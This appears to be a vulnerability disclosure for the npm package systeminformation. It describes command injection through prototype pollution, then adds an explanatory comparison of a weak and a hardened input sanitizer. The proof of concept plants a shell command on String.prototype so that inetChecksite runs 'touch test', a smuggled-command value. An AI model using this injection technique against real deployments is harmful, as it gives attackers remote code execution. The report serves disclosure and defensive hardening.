systeminformation

vulnerability command injection with prototype pollution
severity 8.5
language javascript
registry npm

✍️ Description

With a little trick, attackers can bypass the prototype pollution and inject a malicious command into a safe string, which can give attackers RCE.

🕵️‍♂️ Proof of Concept

// PoC.js
const si = require('systeminformation');
const command = "2";
// `command` is a primitive string, so command.__proto__ is String.prototype
command.__proto__[2] = "233; touch test;//";
si.inetChecksite(command); // which will execute `touch test;`
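
The following is an added example, not code from this report or from systeminformation. It shows why an index-based character filter can pick up a value planted on `String.prototype`, next to a hardened form. `weakSanitize`, `strictSanitize`, `compareUnderPollution` and the `BLOCKED` set are hypothetical names, and the polluted value is a constructed, inert marker.

```javascript
// Added illustration: hypothetical sanitizers, not systeminformation's code.
const BLOCKED = new Set([';', '|', '&', '$', '`', '<', '>', '(', ')', ' ', '\n']);

// Weak: scans a fixed index range. For i >= s.length, s[i] is not an own
// property of the string, so the lookup falls through to String.prototype.
function weakSanitize(s, max = 16) {
  let out = '';
  for (let i = 0; i <= max; i++) {
    const ch = s[i];
    // A multi-character inherited value is not in BLOCKED, so it is copied whole.
    if (ch !== undefined && !BLOCKED.has(ch)) out += ch;
  }
  return out;
}

// Hardened: primitive strings only, indices strictly below length (own
// properties), and each element must be exactly one allowed character.
function strictSanitize(s, max = 2000) {
  if (typeof s !== 'string') throw new TypeError('expected a primitive string');
  const n = Math.min(s.length, max);
  let out = '';
  for (let i = 0; i < n; i++) {
    const ch = s[i];
    if (typeof ch === 'string' && ch.length === 1 && !BLOCKED.has(ch)) out += ch;
  }
  return out;
}

// Pollute index 2 as in the PoC (constructed, inert value), compare, restore.
function compareUnderPollution(input) {
  const marker = 'A;B'; // constructed sample; nothing is executed
  Object.defineProperty(String.prototype, 2, { value: marker, configurable: true });
  try {
    return { weak: weakSanitize(input), strict: strictSanitize(input) };
  } finally {
    delete String.prototype[2]; // leave the runtime clean
  }
}

console.log(compareUnderPollution('2')); // { weak: '2A;B', strict: '2' }
```

Passing arguments as an array to `child_process.execFile` instead of building a shell string removes the dependence on character filtering altogether.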

💥 Impact

This exploit needs a prior prototype pollution attack, and attackers can use this vulnerability to extend their privileges to RCE. (I am wondering if it is a vulnerability in this package or just a side effect.)
